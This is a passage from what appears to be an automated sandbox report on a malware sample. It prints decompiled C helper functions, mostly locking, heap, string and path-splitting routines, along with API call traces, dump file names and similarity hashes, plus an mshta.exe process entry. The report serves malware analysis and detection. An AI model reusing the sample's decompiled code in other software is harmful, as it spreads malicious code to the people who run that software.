                                • HeapFree.KERNEL32(00000000,00000000,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F1118
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F1134
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: de0e21ad6e4ddfbada0bd81b2581a7376fd9dc405486e056537f07c5c2dd4961
                                • Instruction ID: cf45a59cb9d6e4a734eb6c1f15241c8f10fe136eeadc9662b7ed3839a5d243c8
                                • Opcode Fuzzy Hash: de0e21ad6e4ddfbada0bd81b2581a7376fd9dc405486e056537f07c5c2dd4961
                                • Instruction Fuzzy Hash: D5F05E70334241DFE7248F68F84EF1ABBA8BF04710B008038FA4AD7290CB20D890DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F50DF, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E052F50DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x52fa37c; // 0x7459630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x52fa37c; // 0x7459630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x52fa37c; // 0x7459630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x52fb83e) {
					HeapFree( *0x52fa290, 0, _t10);
					_t7 =  *0x52fa37c; // 0x7459630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x052f50df
                                0x052f50e8
                                0x052f50f8
                                0x052f50f8
                                0x052f50fd
                                0x052f5102
                                0x00000000
                                0x00000000
                                0x052f50f2
                                0x052f50f2
                                0x052f5104
                                0x052f5109
                                0x052f510d
                                0x052f5120
                                0x052f5126
                                0x052f5126
                                0x052f512f
                                0x052f5131
                                0x052f5135
                                0x052f513b

                                APIs
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F50E8
                                • Sleep.KERNEL32(0000000A,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F50F2
                                • HeapFree.KERNEL32(00000000,?,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F5120
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F5135
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 07ec039becc2c7842342f4dbf4e1d7701ab01af6c4231063c92cef96999b25d7
                                • Instruction ID: 862de234ec6752e4c3076d8bd145d7a396aedf9ab82aef99cf8661f65ace9c0a
                                • Opcode Fuzzy Hash: 07ec039becc2c7842342f4dbf4e1d7701ab01af6c4231063c92cef96999b25d7
                                • Instruction Fuzzy Hash: 64F0DA74324201DFE7189B24F85EF267BA5FF48721B044038FA0A87790CB30A840DB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F3D98, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E052F3D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E052F6837(_t2);
				if(_t34 != 0) {
					_t30 = E052F6837(_t28);
					if(_t30 == 0) {
						E052F50CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E052F77DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E052F77DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x052f3d98
                                0x052f3da2
                                0x052f3da4
                                0x052f3daa
                                0x052f3daa
                                0x052f3db3
                                0x052f3db7
                                0x052f3dc3
                                0x052f3dc7
                                0x052f3e3b
                                0x052f3dc9
                                0x052f3dc9
                                0x052f3dcd
                                0x052f3dd4
                                0x052f3dd7
                                0x052f3df1
                                0x052f3de0
                                0x052f3de0
                                0x052f3de4
                                0x052f3de7
                                0x052f3dec
                                0x052f3dec
                                0x052f3df6
                                0x052f3e1e
                                0x052f3e24
                                0x052f3e27
                                0x052f3df8
                                0x052f3dfa
                                0x052f3e02
                                0x052f3e0d
                                0x052f3e12
                                0x052f3e12
                                0x052f3e2e
                                0x052f3e35
                                0x052f3e36
                                0x052f3e36
                                0x052f3dc7
                                0x052f3e46

                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,052F3CEE,00000000,00000000,00000000,07459698,?,?,052F106E,?,07459698), ref: 052F3DA4
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                  • Part of subcall function 052F77DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,052F3DD2,00000000,00000001,00000001,?,?,052F3CEE,00000000,00000000,00000000,07459698), ref: 052F77EB
                                  • Part of subcall function 052F77DD: StrChrA.SHLWAPI(?,0000003F,?,?,052F3CEE,00000000,00000000,00000000,07459698,?,?,052F106E,?,07459698,0000EA60,?), ref: 052F77F5
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,052F3CEE,00000000,00000000,00000000,07459698,?,?,052F106E), ref: 052F3E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 052F3E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 052F3E1E
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 237af3fa7d6e77582582ac554ae59d26eae9c923af01945e15eedccc57d38d39
                                • Instruction ID: 22a7d8516e8e0515f5ed4fe92f0e2caab7b5b3696c674cab6f2182a96afed99e
                                • Opcode Fuzzy Hash: 237af3fa7d6e77582582ac554ae59d26eae9c923af01945e15eedccc57d38d39
                                • Instruction Fuzzy Hash: A321A272624256ABCB129F74E888EAEFFB9EF19250B044475FE099B201D730D941C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F5D37, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E052F5D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E052F6837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x052f5d4c
                                0x052f5d50
                                0x052f5d5a
                                0x052f5d61
                                0x052f5d64
                                0x052f5d66
                                0x052f5d6e
                                0x052f5d73
                                0x052f5d81
                                0x052f5d86
                                0x052f5d90

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,074592FC,?,052F1B37,004F0053,074592FC,?,?,?,?,?,?,052F20B0), ref: 052F5D47
                                • lstrlenW.KERNEL32(052F1B37,?,052F1B37,004F0053,074592FC,?,?,?,?,?,?,052F20B0), ref: 052F5D4E
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,052F1B37,004F0053,074592FC,?,?,?,?,?,?,052F20B0), ref: 052F5D6E
                                • memcpy.NTDLL(751469A0,052F1B37,00000002,00000000,004F0053,751469A0,?,?,052F1B37,004F0053,074592FC), ref: 052F5D81
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: ecce23ca3c757c68509e15a466c7524e6b28da36978e2497d24b9ee68726f1b6
                                • Instruction ID: 7d16b0ea28704b29085e2f3c27512ace4c91ccacccc446aec1758fcb7346a4d5
                                • Opcode Fuzzy Hash: ecce23ca3c757c68509e15a466c7524e6b28da36978e2497d24b9ee68726f1b6
                                • Instruction Fuzzy Hash: 0CF0FF76A10118BBCF11DFA9DC89CDEBBACEF092547154066FA08D7101E735EA149BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F21C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(074587FA,00000000,00000000,00000000,052F7100,00000000), ref: 052F21D1
                                • lstrlen.KERNEL32(?), ref: 052F21D9
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • lstrcpy.KERNEL32(00000000,074587FA), ref: 052F21ED
                                • lstrcat.KERNEL32(00000000,?), ref: 052F21F8
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 5ad3772ebe0a54c30b3d389cac015b7956ebf39193627d4bdb547823a529befa
                                • Instruction ID: eb54533bd08efbb948e28874438a6a0d39d6b8d570ca5e402179bd35dd800531
                                • Opcode Fuzzy Hash: 5ad3772ebe0a54c30b3d389cac015b7956ebf39193627d4bdb547823a529befa
                                • Instruction Fuzzy Hash: 66E0ED73911265A787119AA4BC4DD9FBBADEE89661308042AFA0493140CB249805DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: mshta.exe PID: 2264 Parent PID: 3472 mshta.exeCOMMON

                                Executed Functions

                                Function 00000175A94B0FC1, Relevance: .0, Instructions: 5COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000003.469231433.00000175A94B0000.00000010.00000001.sdmp, Offset: 00000175A94B0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                • Instruction ID: bf7d8a1288843d981b78ae881acfde9de7faf60dbb728bdbcfaf10ca365a720a
                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                • Instruction Fuzzy Hash: 5C90021899981A55D51411910C4529C56617388251FD48690851A91148D5DE42962152
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000175A94B0FB9, Relevance: .0, Instructions: 5COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000003.469231433.00000175A94B0000.00000010.00000001.sdmp, Offset: 00000175A94B0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                • Instruction ID: bf7d8a1288843d981b78ae881acfde9de7faf60dbb728bdbcfaf10ca365a720a
                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                • Instruction Fuzzy Hash: 5C90021899981A55D51411910C4529C56617388251FD48690851A91148D5DE42962152
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions